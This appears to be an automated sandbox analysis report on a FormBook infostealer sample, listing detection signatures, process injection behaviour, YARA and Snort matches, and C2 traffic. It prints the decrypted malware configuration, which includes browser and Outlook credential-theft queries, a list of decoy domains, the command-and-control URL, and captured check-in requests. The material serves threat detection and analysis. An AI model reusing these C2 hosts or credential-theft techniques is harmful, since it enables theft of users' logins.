Loading ...

Play interactive tourEdit tour

Analysis Report HOPEFUL.exe

Overview

General Information

Sample Name:HOPEFUL.exe
Analysis ID:339365
MD5:9c15af175868121cc014666189d52dae
SHA1:3ba03f47a8762368538e47806353f55da43d46ac
SHA256:7c8f873fc34661a785875f76a1f3b1aff6719e69d2a4ea5d2d94f849282b623a
Tags:exeFormbook

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Allocates memory in foreign processes
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to launch a process as a different user
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • HOPEFUL.exe (PID: 6744 cmdline: 'C:\Users\user\Desktop\HOPEFUL.exe' MD5: 9C15AF175868121CC014666189D52DAE)
    • AddInProcess32.exe (PID: 6548 cmdline: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe MD5: F2A47587431C466535F3C3D3427724BE)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmmon32.exe (PID: 4656 cmdline: C:\Windows\SysWOW64\cmmon32.exe MD5: 2879B30A164B9F7671B5E6B2E9F8DFDA)
          • cmd.exe (PID: 4240 cmdline: /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"Config: ": ["CONFIG_PATTERNS 0x8bc2", "KEY1_OFFSET 0x1d510", "CONFIG SIZE : 0xf7", "CONFIG OFFSET 0x1d615", "URL SIZE : 33", "searching string pattern", "strings_offset 0x1c1a3", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0x1004744a", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70d3", "0x9f715026", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad012172", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd014c1", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04", "0x50c2a508", "0x3e88e8bf", "0x4b6374a6", "0x72a93198", "0x85426977", "0xea193e11", "0xea653007", "0xe297c9c", "0x65399e87", "0x23609e75", "0xb92e8a5a", "0xabc89476", "0xd989572f", "0x4536ab86", "0x3476afc1", "0xaf24a63b", "0x393b9ac8", "0x414a3c70", "0x487e77f4", "0xbee1bdf6", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "--------------------------------------------------", "Decrypted Strings", "--------------------------------------------------", "USERNAME", "LOCALAPPDATA", "USERPROFILE", "APPDATA", "TEMP", "ProgramFiles", "CommonProgramFiles", "ALLUSERSPROFILE", "/c copy \"", "/c del \"", "\\Run", "\\Policies", "\\Explorer", "\\Registry\\User", "\\Registry\\Machine", "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", "Office\\15.0\\Outlook\\Profiles\\Outlook\\", " NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\", "\\SOFTWARE\\Mozilla\\Mozilla ", "\\Mozilla", "Username: ", "Password: ", "formSubmitURL", "usernameField", "encryptedUsername", "encryptedPassword", "\\logins.json", "\\signons.sqlite", "\\Microsoft\\Vault\\", "SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins", "\\Google\\Chrome\\User Data\\Default\\Login Data", "SELECT origin_url, username_value, password_value FROM logins", ".exe", ".com", ".scr", ".pif", ".cmd", ".bat", "ms", "win", "gdi", "mfc", "vga", "igfx", "user", "help", "config", "update", "regsvc", "chkdsk", "systray", "audiodg", "certmgr", "autochk", "taskhost", "colorcpl", "services", "IconCache", "ThumbCache", "Cookies", "SeDebugPrivilege", "SeShutdownPrivilege", "\\BaseNamedObjects", "config.php", "POST ", " HTTP/1.1", "", "Host: ", "", "Connection: close", "", "Content-Length: ", "", "Cache-Control: no-cache", "", "Origin: http://", "", "User-Agent: Mozilla Firefox/4.0", "", "Content-Type: application/x-www-form-urlencoded", "", "Accept: */*", "", "Referer: http://", "", "Accept-Language: en-US", "", "Accept-Encoding: gzip, deflate", "", "dat=", "f-start", "strahlenschutz.digital", "soterppe.com", "wlw-hnlt.com", "topheadlinetowitness-today.info", "droriginals.com", "baculatechie.online", "definity.finance", "weddingmustgoon.com", "ludisenofloral.com", "kenniscourtureconsignments.com", "dl888.net", "singledynamics.com", "internetmarkaching.com", "solidconstruct.site", "ip-freight.com", "11sxsx.com", "incomecontent.com", "the343radio.com", "kimberlygoedhart.net", "dgdoughnuts.net", "vivethk.com", "st-reet.com", "luxusgrotte.com", "hareland.info", "fitdramas.com", "shakahats.com", "cositasdepachecos.com", "lhc965.com", "5hnjy.com", "zoommedicaremeetings.com", "bebywye.site", "ravenlewis.com", "avia-sales.xyz", "screwtaped.com", "xaustock.com", "hongreng.xyz", "lokalised.com", "neosolutionsllc.com", "ecandkllc.com", "sistertravelalliance.com", "brotherhoodoffathers.com", "mybestme.store", "vigilantdis.com", "sqatzx.com", "kornteengoods.com", "miamiwaterworld.com", "mywillandmylife.com", "novergi.com", "eaglesnestpropheticministry.com", "sterlworldshop.com", "gabriellagullberg.com", "toweroflifeinc.com", "tiendazoom.com", "dividupe.com", "szyulics.com", "theorangepearl.com", "hotvidzhub.download", "asacal.com", "systemedalarmebe.com", "margosbest.com", "kathymusic.com", "quintred.com", "mad54.art", "simplification.business", "f-end", "--------------------------------------------------", "Decrypted CnC URL", "--------------------------------------------------", "www.registeredagentfirm.com/jqc/\u0000"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000013.00000002.557782096.0000000000EC0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000013.00000002.557782096.0000000000EC0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000013.00000002.557782096.0000000000EC0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18409:$sqlite3step: 68 34 1C 7B E1
    • 0x1851c:$sqlite3step: 68 34 1C 7B E1
    • 0x18438:$sqlite3text: 68 38 2A 90 C5
    • 0x1855d:$sqlite3text: 68 38 2A 90 C5
    • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
    00000013.00000002.558552585.0000000003090000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000013.00000002.558552585.0000000003090000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      5.2.AddInProcess32.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        5.2.AddInProcess32.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        5.2.AddInProcess32.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17609:$sqlite3step: 68 34 1C 7B E1
        • 0x1771c:$sqlite3step: 68 34 1C 7B E1
        • 0x17638:$sqlite3text: 68 38 2A 90 C5
        • 0x1775d:$sqlite3text: 68 38 2A 90 C5
        • 0x1764b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17773:$sqlite3blob: 68 53 D8 7F 8C
        5.2.AddInProcess32.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          5.2.AddInProcess32.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 5.2.AddInProcess32.exe.400000.0.unpackMalware Configuration Extractor: FormBook {"Config: ": ["CONFIG_PATTERNS 0x8bc2", "KEY1_OFFSET 0x1d510", "CONFIG SIZE : 0xf7", "CONFIG OFFSET 0x1d615", "URL SIZE : 33", "searching string pattern", "strings_offset 0x1c1a3", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0x1004744a", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70d3", "0x9f715026", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad012172", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd014c1", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04",
          Multi AV Scanner detection for submitted fileShow sources
          Source: HOPEFUL.exeReversingLabs: Detection: 31%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000013.00000002.557782096.0000000000EC0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.558552585.0000000003090000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.342835005.00000000017B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.341874969.0000000001380000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.298637498.0000000004A76000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.560537897.0000000004B40000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.341186182.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.298890035.0000000004B4D000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: HOPEFUL.exeJoe Sandbox ML: detected
          Source: 5.2.AddInProcess32.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: HOPEFUL.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: HOPEFUL.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
          Source: Binary string: AddInProcess32.pdb source: HOPEFUL.exe, 00000000.00000003.279597183.0000000001459000.00000004.00000001.sdmp, AddInProcess32.exe, cmmon32.exe, 00000013.00000002.563508472.00000000052EF000.00000004.00000001.sdmp, AddInProcess32.exe.0.dr
          Source: Binary string: cmmon32.pdb source: AddInProcess32.exe, 00000005.00000002.342910894.00000000017E0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000D.00000000.313912320.0000000006560000.00000002.00000001.sdmp
          Source: Binary string: cmmon32.pdbGCTL source: AddInProcess32.exe, 00000005.00000002.342910894.00000000017E0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: AddInProcess32.exe, 00000005.00000002.342946293.00000000017F0000.00000040.00000001.sdmp, cmmon32.exe, 00000013.00000002.561037335.0000000004DC0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: AddInProcess32.exe, cmmon32.exe
          Source: Binary string: AddInProcess32.pdbpw source: HOPEFUL.exe, 00000000.00000003.279597183.0000000001459000.00000004.00000001.sdmp, AddInProcess32.exe, 00000005.00000002.341420581.0000000000DE2000.00000002.00020000.sdmp, cmmon32.exe, 00000013.00000002.563508472.00000000052EF000.00000004.00000001.sdmp, AddInProcess32.exe.0.dr
          Source: Binary string: wscui.pdb source: explorer.exe, 0000000D.00000000.313912320.0000000006560000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\HOPEFUL.exeCode function: 4x nop then jmp 0164F5EEh0_2_0164EE1A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 4x nop then pop edi5_2_00416BF3
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 4x nop then pop edi5_2_00416C07
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 4x nop then pop edi5_2_00416C27
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 4x nop then pop edi5_2_00416C3F
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 4x nop then pop edi5_2_00417D68
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4x nop then pop edi19_2_00ED6BF3
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4x nop then pop edi19_2_00ED6C27
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4x nop then pop edi19_2_00ED6C3F
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4x nop then pop edi19_2_00ED6C07
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4x nop then pop edi19_2_00ED7D68

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49756 -> 35.169.40.107:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49756 -> 35.169.40.107:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49756 -> 35.169.40.107:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49760 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49760 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49760 -> 34.102.136.180:80
          Source: global trafficHTTP traffic detected: GET /jqc/?vJBt9=0p-TOvv8KBuxgpiP&ndlpiZc=Jqp6Vrh7x4dPMrIQX7VIzLiEvICxUcdwdSrDbGPbei90zUxLRJiOLwAKv7MnajRyqhPp HTTP/1.1Host: www.the343radio.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /jqc/?ndlpiZc=0xbExnfI3Prv/1KpQ0CN/ByOc92DgA9UHu9nxr7GrQjbPgIXGkWI8+X1opataUjCpyTL&vJBt9=0p-TOvv8KBuxgpiP HTTP/1.1Host: www.registeredagentfirm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /jqc/?vJBt9=0p-TOvv8KBuxgpiP&ndlpiZc=EnI9If5tS4P3VQhtW/9J+s0mIpyxI+H/HK4ULnRjNfqJIxJ/UO/Pi364qc4j+Eh6gi9p HTTP/1.1Host: www.tiendazoom.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 34.98.99.30 34.98.99.30
          Source: Joe Sandbox ViewASN Name: IHNETUS IHNETUS
          Source: Joe Sandbox ViewASN Name: AMAZON-AESUS AMAZON-AESUS
          Source: Joe Sandbox ViewASN Name: GOOGLEUS GOOGLEUS
          Source: global trafficHTTP traffic detected: GET /jqc/?vJBt9=0p-TOvv8KBuxgpiP&ndlpiZc=Jqp6Vrh7x4dPMrIQX7VIzLiEvICxUcdwdSrDbGPbei90zUxLRJiOLwAKv7MnajRyqhPp HTTP/1.1Host: www.the343radio.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /jqc/?ndlpiZc=0xbExnfI3Prv/1KpQ0CN/ByOc92DgA9UHu9nxr7GrQjbPgIXGkWI8+X1opataUjCpyTL&vJBt9=0p-TOvv8KBuxgpiP HTTP/1.1Host: www.registeredagentfirm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /jqc/?vJBt9=0p-TOvv8KBuxgpiP&ndlpiZc=EnI9If5tS4P3VQhtW/9J+s0mIpyxI+H/HK4ULnRjNfqJIxJ/UO/Pi364qc4j+Eh6gi9p HTTP/1.1Host: www.tiendazoom.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.the343radio.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Jan 2021 20:50:04 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
